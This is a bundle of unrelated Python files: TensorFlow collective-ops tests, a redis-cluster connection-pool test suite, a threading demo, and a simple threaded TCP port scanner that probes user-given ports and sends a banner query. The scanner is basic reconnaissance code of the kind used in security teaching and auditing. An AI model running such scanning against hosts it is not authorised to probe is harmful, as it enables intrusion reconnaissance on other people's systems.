group_key = 1
instance_key = 1
return collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_reduce_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_reduce_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_reduce_2devices():
self.assertAllClose(result, [2.], rtol=1e-5, atol=1e-5)
def testGather(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_gather_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
return collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_gather_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_gather_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_gather_2devices():
self.assertAllClose(result, [1., 1.], rtol=1e-5, atol=1e-5)
def testInstanceKeyScopedUnderGroupKey(self, collective_ops, device,
communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
dev2 = '/device:%s:2' % device
dev3 = '/device:%s:3' % device
@def_function.function
def run_all_reduce_4devices_same_instance_key():
# Use a common instance key for both groups.
instance_key = 0
# We will create 2 groups each with 2 devices.
group_size = 2
# Group 0 comprises dev0 and dev1.
group0_key = 0
# Group 1 comprises dev2 and dev3.
group1_key = 1
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(1.), group_size, group0_key, instance_key))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(2.), group_size, group0_key, instance_key))
with ops.device(dev2):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(3.), group_size, group1_key, instance_key))
with ops.device(dev3):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(4.), group_size, group1_key, instance_key))
return collectives
results = run_all_reduce_4devices_same_instance_key()
self.assertAllClose(results[0], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[1], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[2], 7., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[3], 7., rtol=1e-5, atol=1e-5)
def testCollectiveGroupSizeOne(self, collective_ops, device, communication):
if communication == 'NCCL':
self.skipTest('b/170672646: it crashes with NCCL and group size one')
dev0 = '/device:%s:0' % device
group_size = 1
group_key = 100
instance_key = 100
in_value = [1., 2., 3., 4.]
in_tensor = constant_op.constant(in_value)
with ops.device(dev0):
reduced_tensor = collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
self.assertAllEqual(in_value, reduced_tensor.numpy())
with ops.device(dev0):
gathered_tensor = collective_ops.all_gather(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
self.assertAllEqual(in_value, gathered_tensor.numpy())
def testMultipleGroups(self, collective_ops, device, communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
num_elements = 4
@def_function.function
def run_all_reduce(group_size, group_key):
instance_key = group_key
input_value = [float(group_key) for i in range(num_elements)]
collectives = []
for device_idx in range(group_size):
with ops.device('/{}:{}'.format(device, device_idx)):
input_tensor = constant_op.constant(input_value)
collectives.append(
collective_ops.all_reduce(
input_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
def run_and_assert(group_size, group_key):
for reduced_tensor in run_all_reduce(group_size, group_key):
self.assertAllEqual(
[float(group_key) * group_size for i in range(num_elements)],
reduced_tensor.numpy())
run_and_assert(group_size=2, group_key=1)
run_and_assert(group_size=3, group_key=2)
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
class AbortCollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testAbortGroupParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
def testAbortInstanceParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# First perform a normal all-reduce to complete the group resolution.
def_function.function(collective_fn)()
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
# Use a different instance key to trigger another instance resolution.
instance_key = 101
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
context._reset_context() # pylint: disable=protected-access
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def_function.function(collective_fn)()
def testAbortCommunication(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# First perform a normal collective to finish resolution.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
# Launch a collective that hangs, and abort the collective executor after
# the launch.
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# Reset the context in order to reset the collective executor.
t.join()
_setup_context()
def_function.function(collective_fn)()
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
class TimeoutTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testTimeout(self, collective_op, device, communication):
if device == 'GPU':
self.skipTest('b/170980122')
timeout = 1.5
@def_function.function
def run(group_size, reported_group_size=None):
group_key = 20
instance_key = 30
tensor = [1., 2., 3., 4.]
results = []
if reported_group_size is None:
reported_group_size = group_size
for i in range(group_size):
with ops.device('/{}:{}'.format(device, i)):
input_data = constant_op.constant(tensor)
result = collective_op(
input_data,
group_size=reported_group_size,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
results.append(result)
return results
run(2, 2)
start_time = time.time()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
run(1, 2)
elapsed = time.time() - start_time
self.assertAllGreaterEqual(elapsed, timeout)
def testParamResolutionAfterTimeout(self, collective_op, device,
communication):
if device == 'GPU':
self.skipTest('b/170980122')
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
# This timeout comes from param solution.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev1):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
def testExecutionAfterTimeout(self, collective_op, device, communication):
if device == 'GPU':
self.skipTest('b/170980122')
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
@def_function.function
def run():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# Run a normal all-reduce to complete param resolution.
run()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev1):
# No timeout.
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
def _setup_context():
context._reset_context()
test_util.set_logical_devices_to_at_least('CPU', 4)
context.ensure_initialized()
if __name__ == '__main__':
v2_compat.enable_v2_behavior()
test.main()
|
python_port_scanner_threaded.py
|
#!/bin/python
"""
python_port_scanner_threaded.py
Purpose: Python-based TCP port scanner
Author: Cody Jackson
Date: 2/16/2018
########################
Version 0.1
Initial build
"""
import argparse
import socket
import threading
def connection_scan(target_ip, target_port):
"""Attempts to create a socket connection with the given IP address and port.
If successful, the port is open. If not, the port is closed.
"""
try:
conn_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn_socket.connect((target_ip, target_port))
conn_socket.send(b'Banner_query\r\n')
print("[+] {}/tcp open".format(target_port))
except OSError:
print("[-] {}/tcp closed".format(target_port))
finally:
conn_socket.close() # Ensure the connection is closed
def port_scan(target, port_num):
"""Scan indicated ports for status.
First, it attempts to resolve the IP address of a provided hostname, then enumerates through the ports. Threads are
used to call the connection_scan() function.
"""
try:
target_ip = socket.gethostbyname(target)
except OSError:
print("[^] Cannot resolve {}: Unknown host".format(target))
return # Exit scan if target IP is not resolved
try:
target_name = socket.gethostbyaddr(target_ip)
print('[*] Scan Results for: {}'.format(target_name[0]))
except OSError:
print('[*] Scan Results for: {}'.format(target_ip))
t = threading.Thread(target=connection_scan, args=(target, int(port_num)))
t.start()
def argument_parser():
"""Allow user to specify target host and port."""
parser = argparse.ArgumentParser(description="TCP port scanner. Accepts a hostname/IP address and list of ports to "
"scan. Attempts to identify the service running on a port.")
parser.add_argument("-o", "--host", nargs="?", help="Host IP address")
parser.add_argument("-p", "--ports", nargs="?", help="Comma-separated port list, such as '25,80,8080'")
var_args = vars(parser.parse_args()) # Convert argument namespace to dictionary
return var_args
if __name__ == '__main__':
try:
user_args = argument_parser()
host = user_args["host"]
port_list = user_args["ports"].split(",") # Make a list from port numbers
for port in port_list:
port_scan(host, port)
except AttributeError:
print("Error. Please provide the command-line arguments before running.")
|
thread_01.py
|
# thread_01.py
# 실행을 멈추려면 ctrl+break
import threading
import time
def client_thread(clientname, sec):
while True:
print("{} - 지연 {} ".format(clientname, sec))
time.sleep(sec)
clientA = threading.Thread(target=client_thread, args=("clientA", 0.1))
clientB = threading.Thread(target=client_thread, args=("clientB", 0.1))
clientC = threading.Thread(target=client_thread, args=("clientC", 2))
clientD = threading.Thread(target=client_thread, args=("clientD", 0.1))
clientE = threading.Thread(target=client_thread, args=("clientE", 0.1))
clientF = threading.Thread(target=client_thread, args=("clientF", 0.1))
clientG = threading.Thread(target=client_thread, args=("clientG", 0.1))
clientH = threading.Thread(target=client_thread, args=("clientH", 1))
clientA.start()
clientB.start()
clientC.start()
clientD.start()
clientE.start()
clientF.start()
clientG.start()
clientH.start()
|
test_cluster_connection_pool.py
|
# -*- coding: utf-8 -*-
# python std lib
import os
import re
import time
from threading import Thread
# rediscluster imports
from rediscluster.connection import (
ClusterConnectionPool, ClusterReadOnlyConnectionPool,
ClusterConnection, UnixDomainSocketConnection)
from rediscluster.exceptions import RedisClusterException
from tests.conftest import skip_if_server_version_lt
# 3rd party imports
import pytest
import redis
from mock import patch, Mock
from redis.connection import ssl_available, to_bool
from redis._compat import unicode
class DummyConnection(object):
description_format = "DummyConnection<>"
def __init__(self, host="localhost", port=7000, socket_timeout=None, **kwargs):
self.kwargs = kwargs
self.pid = os.getpid()
self.host = host
self.port = port
self.socket_timeout = socket_timeout
def get_pool(connection_kwargs=None, max_connections=None, max_connections_per_node=None, connection_class=DummyConnection, init_slot_cache=True):
connection_kwargs = connection_kwargs or {}
pool = ClusterConnectionPool(
connection_class=connection_class,
max_connections=max_connections,
max_connections_per_node=max_connections_per_node,
startup_nodes=[{"host": "127.0.0.1", "port": 7000}],
init_slot_cache=init_slot_cache,
**connection_kwargs)
return pool
class TestConnectionPool(object):
def get_pool(self, connection_kwargs=None, max_connections=None, max_connections_per_node=None,
connection_class=DummyConnection, init_slot_cache=True):
connection_kwargs = connection_kwargs or {}
pool = ClusterConnectionPool(
connection_class=connection_class,
max_connections=max_connections,
max_connections_per_node=max_connections_per_node,
startup_nodes=[{"host": "127.0.0.1", "port": 7000}],
init_slot_cache=init_slot_cache,
**connection_kwargs)
return pool
def test_in_use_not_exists(self):
"""
Test that if for some reason, the node that it tries to get the connection for
do not exists in the _in_use_connection variable.
"""
pool = self.get_pool()
pool._in_use_connections = {}
pool.get_connection("pubsub", channel="foobar")
def test_connection_creation(self):
connection_kwargs = {'foo': 'bar', 'biz': 'baz'}
pool = self.get_pool(connection_kwargs=connection_kwargs)
connection = pool.get_connection_by_node({"host": "127.0.0.1", "port": 7000})
assert isinstance(connection, DummyConnection)
assert connection.kwargs == connection_kwargs
def test_multiple_connections(self):
pool = self.get_pool()
c1 = pool.get_connection_by_node({"host": "127.0.0.1", "port": 7000})
c2 = pool.get_connection_by_node({"host": "127.0.0.1", "port": 7001})
assert c1 != c2
def test_max_connections(self):
pool = self.get_pool(max_connections=2)
pool.get_connection_by_node({"host": "127.0.0.1", "port": 7000})
pool.get_connection_by_node({"host": "127.0.0.1", "port": 7001})
with pytest.raises(RedisClusterException):
pool.get_connection_by_node({"host": "127.0.0.1", "port": 7000})
def test_max_connections_per_node(self):
pool = self.get_pool(max_connections=2, max_connections_per_node=True)
pool.get_connection_by_node({"host": "127.0.0.1", "port": 7000})
pool.get_connection_by_node({"host": "127.0.0.1", "port": 7001})
pool.get_connection_by_node({"host": "127.0.0.1", "port": 7000})
pool.get_connection_by_node({"host": "127.0.0.1", "port": 7001})
with pytest.raises(RedisClusterException):
pool.get_connection_by_node({"host": "127.0.0.1", "port": 7000})
def test_max_connections_default_setting(self):
pool = self.get_pool(max_connections=None)
assert pool.max_connections == 2 ** 31
def test_reuse_previously_released_connection(self):
pool = self.get_pool()
c1 = pool.get_connection_by_node({"host": "127.0.0.1", "port": 7000})
pool.release(c1)
c2 = pool.get_connection_by_node({"host": "127.0.0.1", "port": 7000})
assert c1 == c2
def test_repr_contains_db_info_tcp(self):
"""
Note: init_slot_cache muts be set to false otherwise it will try to
query the test server for data and then it can't be predicted reliably
"""
connection_kwargs = {'host': 'localhost', 'port': 7000}
pool = self.get_pool(connection_kwargs=connection_kwargs,
connection_class=ClusterConnection,
init_slot_cache=False)
expected = 'ClusterConnectionPool<ClusterConnection<host=localhost,port=7000>>'
assert repr(pool) == expected
def test_repr_contains_db_info_unix(self):
"""
Note: init_slot_cache muts be set to false otherwise it will try to
query the test server for data and then it can't be predicted reliably
"""
connection_kwargs = {'path': '/abc', 'db': 1}
pool = self.get_pool(connection_kwargs=connection_kwargs,
connection_class=UnixDomainSocketConnection,
init_slot_cache=False)
expected = 'ClusterConnectionPool<ClusterUnixDomainSocketConnection<path=/abc>>'
assert repr(pool) == expected
def test_get_connection_by_key(self):
"""
This test assumes that when hashing key 'foo' will be sent to server with port 7002
"""
pool = self.get_pool(connection_kwargs={})
# Patch the call that is made inside the method to allow control of the returned connection object
with patch.object(ClusterConnectionPool, 'get_connection_by_slot', autospec=True) as pool_mock:
def side_effect(self, *args, **kwargs):
return DummyConnection(port=1337)
pool_mock.side_effect = side_effect
connection = pool.get_connection_by_key("foo", 'GET')
assert connection.port == 1337
with pytest.raises(RedisClusterException) as ex:
pool.get_connection_by_key(None, None)
assert unicode(ex.value).startswith("No way to dispatch this command to Redis Cluster."), True
def test_get_connection_by_slot(self):
"""
This test assumes that when doing keyslot operation on "foo" it will return 12182
"""
pool = self.get_pool(connection_kwargs={})
# Patch the call that is made inside the method to allow control of the returned connection object
with patch.object(ClusterConnectionPool, 'get_connection_by_node', autospec=True) as pool_mock:
def side_effect(self, *args, **kwargs):
return DummyConnection(port=1337)
pool_mock.side_effect = side_effect
connection = pool.get_connection_by_slot(12182)
assert connection.port == 1337
m = Mock()
pool.get_random_connection = m
# If None value is provided then a random node should be tried/returned
pool.get_connection_by_slot(None)
m.assert_called_once_with()
def test_get_connection_blocked(self):
"""
Currently get_connection() should only be used by pubsub command.
All other commands should be blocked and exception raised.
"""
pool = self.get_pool()
with pytest.raises(RedisClusterException) as ex:
pool.get_connection("GET")
assert unicode(ex.value).startswith("Only 'pubsub' commands can be used by get_connection()")
def test_master_node_by_slot(self):
pool = self.get_pool(connection_kwargs={})
node = pool.get_master_node_by_slot(0)
node['port'] = 7000
node = pool.get_master_node_by_slot(12182)
node['port'] = 7002
class TestReadOnlyConnectionPool(object):
def get_pool(self, connection_kwargs=None, max_connections=None, init_slot_cache=True, startup_nodes=None):
startup_nodes = startup_nodes or [{'host': '127.0.0.1', 'port': 7000}]
connection_kwargs = connection_kwargs or {}
pool = ClusterReadOnlyConnectionPool(
init_slot_cache=init_slot_cache,
max_connections=max_connections,
startup_nodes=startup_nodes,
**connection_kwargs)
return pool
def test_repr_contains_db_info_readonly(self):
"""
Note: init_slot_cache must be set to false otherwise it will try to
query the test server for data and then it can't be predicted reliably
"""
pool = self.get_pool(
init_slot_cache=False,
startup_nodes=[{"host": "127.0.0.1", "port": 7000}, {"host": "127.0.0.2", "port": 7001}],
)
expected = 'ClusterReadOnlyConnectionPool<ClusterConnection<host=127.0.0.1,port=7000>, ClusterConnection<host=127.0.0.2,port=7001>>'
assert repr(pool) == expected
def test_max_connections(self):
pool = self.get_pool(max_connections=2)
pool.get_connection_by_node({"host": "127.0.0.1", "port": 7000})
pool.get_connection_by_node({"host": "127.0.0.1", "port": 7001})
with pytest.raises(RedisClusterException):
pool.get_connection_by_node({"host": "127.0.0.1", "port": 7000})
def test_get_connection_by_slot(self):
"""
"""
pool = self.get_pool(connection_kwargs={})
# Patch the call that is made inside the method to allow control of the returned connection object
with patch.object(ClusterReadOnlyConnectionPool, 'get_master_connection_by_slot', autospec=True) as pool_mock:
def side_effect(self, *args, **kwargs):
return DummyConnection(port=1337)
pool_mock.side_effect = side_effect
# Try a master only command
connection = pool.get_connection_by_key("foo", 'ZSCAN')
assert connection.port == 1337
with patch.object(ClusterReadOnlyConnectionPool, 'get_random_master_slave_connection_by_slot', autospec=True) as pool_mock:
def side_effect(self, *args, **kwargs):
return DummyConnection(port=1337)
pool_mock.side_effect = side_effect
# try a random node command
connection = pool.get_connection_by_key('foo', 'GET')
assert connection.port == 1337
with pytest.raises(RedisClusterException) as ex:
pool.get_connection_by_key(None, None)
assert unicode(ex.value).startswith("No way to dispatch this command to Redis Cluster."), True
def test_get_node_by_slot_random(self):
"""
We can randomly get all nodes in readonly mode.
"""
pool = self.get_pool(connection_kwargs={})
# Set the values that we expect to be set for the NodeManager. Represents 2 nodes for 1 specific slot
pool.nodes.slots[0] = [
{'host': '172.20.0.2', 'port': 7000, 'name': '172.20.0.2:7000', 'server_type': 'master'},
{'host': '172.20.0.2', 'port': 7003, 'name': '172.20.0.2:7003', 'server_type': 'slave'},
]
expected_ports = {7000, 7003}
actual_ports = set()
for _ in range(0, 100):
node = pool.get_node_by_slot_random(0)
actual_ports.add(node['port'])
assert actual_ports == expected_ports
@pytest.mark.xfail(reason="Blocking connection pool is not supported in this cluster client")
class TestBlockingConnectionPool(object):
def get_pool(self, connection_kwargs=None, max_connections=10, timeout=20):
connection_kwargs = connection_kwargs or {}
pool = redis.BlockingConnectionPool(connection_class=DummyConnection,
max_connections=max_connections,
timeout=timeout,
**connection_kwargs)
return pool
def test_connection_creation(self):
connection_kwargs = {'foo': 'bar', 'biz': 'baz'}
pool = self.get_pool(connection_kwargs=connection_kwargs)
connection = pool.get_connection('_')
assert isinstance(connection, DummyConnection)
assert connection.kwargs == connection_kwargs
def test_multiple_connections(self):
pool = self.get_pool()
c1 = pool.get_connection('_')
c2 = pool.get_connection('_')
assert c1 != c2
def test_connection_pool_blocks_until_timeout(self):
"When out of connections, block for timeout seconds, then raise"
pool = self.get_pool(max_connections=1, timeout=0.1)
pool.get_connection('_')
start = time.time()
with pytest.raises(redis.ConnectionError):
pool.get_connection('_')
# we should have waited at least 0.1 seconds
assert time.time() - start >= 0.1
def connection_pool_blocks_until_another_connection_released(self):
"""
When out of connections, block until another connection is released
to the pool
"""
pool = self.get_pool(max_connections=1, timeout=2)
c1 = pool.get_connection('_')
def target():
time.sleep(0.1)
pool.release(c1)
Thread(target=target).start()
start = time.time()
pool.get_connection('_')
assert time.time() - start >= 0.1
def test_reuse_previously_released_connection(self):
pool = self.get_pool()
c1 = pool.get_connection('_')
pool.release(c1)
c2 = pool.get_connection('_')
assert c1 == c2
def test_repr_contains_db_info_tcp(self):
pool = redis.ConnectionPool(host='localhost', port=6379, db=0)
expected = 'ConnectionPool<Connection<host=localhost,port=6379,db=0>>'
assert repr(pool) == expected
def test_repr_contains_db_info_unix(self):
pool = redis.ConnectionPool(
connection_class=redis.UnixDomainSocketConnection,
path='abc',
db=0,
)
expected = 'ConnectionPool<UnixDomainSocketConnection<path=abc,db=0>>'
assert repr(pool) == expected
class TestConnectionPoolURLParsing(object):
def test_defaults(self):
pool = redis.ConnectionPool.from_url('redis://localhost')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 0,
'password': None,
}
def test_hostname(self):
pool = redis.ConnectionPool.from_url('redis://myhost')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'myhost',
'port': 6379,
'db': 0,
'password': None,
}
def test_quoted_hostname(self):
pool = redis.ConnectionPool.from_url('redis://my %2F host %2B%3D+',
decode_components=True)
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'my / host +=+',
'port': 6379,
'db': 0,
'password': None,
}
def test_port(self):
pool = redis.ConnectionPool.from_url('redis://localhost:6380')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6380,
'db': 0,
'password': None,
}
def test_password(self):
pool = redis.ConnectionPool.from_url('redis://:mypassword@localhost')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 0,
'password': 'mypassword',
}
def test_quoted_password(self):
pool = redis.ConnectionPool.from_url(
'redis://:%2Fmypass%2F%2B word%3D%24+@localhost',
decode_components=True)
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 0,
'password': '/mypass/+ word=$+',
}
def test_quoted_path(self):
pool = redis.ConnectionPool.from_url(
'unix://:mypassword@/my%2Fpath%2Fto%2F..%2F+_%2B%3D%24ocket',
decode_components=True)
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/my/path/to/../+_+=$ocket',
'db': 0,
'password': 'mypassword',
}
def test_db_as_argument(self):
pool = redis.ConnectionPool.from_url('redis://localhost', db='1')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 1,
'password': None,
}
def test_db_in_path(self):
pool = redis.ConnectionPool.from_url('redis://localhost/2', db='1')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 2,
'password': None,
}
def test_db_in_querystring(self):
pool = redis.ConnectionPool.from_url('redis://localhost/2?db=3',
db='1')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 3,
'password': None,
}
def test_extra_typed_querystring_options(self):
pool = redis.ConnectionPool.from_url(
'redis://localhost/2?socket_timeout=20&socket_connect_timeout=10'
'&socket_keepalive=&retry_on_timeout=Yes&max_connections=10'
)
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 2,
'socket_timeout': 20.0,
'socket_connect_timeout': 10.0,
'retry_on_timeout': True,
'password': None,
}
assert pool.max_connections == 10
def test_boolean_parsing(self):
for expected, value in (
(None, None),
(None, ''),
(False, 0), (False, '0'),
(False, 'f'), (False, 'F'), (False, 'False'),
(False, 'n'), (False, 'N'), (False, 'No'),
(True, 1), (True, '1'),
(True, 'y'), (True, 'Y'), (True, 'Yes'),
):
assert expected is to_bool(value)
def test_extra_querystring_options(self):
pool = redis.ConnectionPool.from_url('redis://localhost?a=1&b=2')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 0,
'password': None,
'a': '1',
'b': '2'
}
def test_calling_from_subclass_returns_correct_instance(self):
pool = redis.BlockingConnectionPool.from_url('redis://localhost')
assert isinstance(pool, redis.BlockingConnectionPool)
def test_client_creates_connection_pool(self):
r = redis.Redis.from_url('redis://myhost')
assert r.connection_pool.connection_class == redis.Connection
assert r.connection_pool.connection_kwargs == {
'host': 'myhost',
'port': 6379,
'db': 0,
'password': None,
}
class TestConnectionPoolUnixSocketURLParsing(object):
def test_defaults(self):
pool = redis.ConnectionPool.from_url('unix:///socket')
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/socket',
'db': 0,
'password': None,
}
def test_password(self):
pool = redis.ConnectionPool.from_url('unix://:mypassword@/socket')
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/socket',
'db': 0,
'password': 'mypassword',
}
def test_db_as_argument(self):
pool = redis.ConnectionPool.from_url('unix:///socket', db=1)
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/socket',
'db': 1,
'password': None,
}
def test_db_in_querystring(self):
pool = redis.ConnectionPool.from_url('unix:///socket?db=2', db=1)
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/socket',
'db': 2,
'password': None,
}
def test_extra_querystring_options(self):
pool = redis.ConnectionPool.from_url('unix:///socket?a=1&b=2')
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/socket',
'db': 0,
'password': None,
'a': '1',
'b': '2'
}
class TestSSLConnectionURLParsing(object):
@pytest.mark.skipif(not ssl_available, reason="SSL not installed")
def test_defaults(self):
pool = redis.ConnectionPool.from_url('rediss://localhost')
assert pool.connection_class == redis.SSLConnection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 0,
'password': None,
}
@pytest.mark.skipif(not ssl_available, reason="SSL not installed")
def test_cert_reqs_options(self):
"""
rediss://[[username]:[password]]@localhost:6379/0
"""
import ssl
pool = get_pool().from_url('rediss://localhost:7000?ssl_cert_reqs=none')
assert pool.get_random_connection().cert_reqs == ssl.CERT_NONE
pool = get_pool().from_url('rediss://localhost:7000?ssl_cert_reqs=optional')
assert pool.get_random_connection().cert_reqs == ssl.CERT_OPTIONAL
pool = get_pool().from_url('rediss://localhost:7000?ssl_cert_reqs=required')
assert pool.get_random_connection().cert_reqs == ssl.CERT_REQUIRED
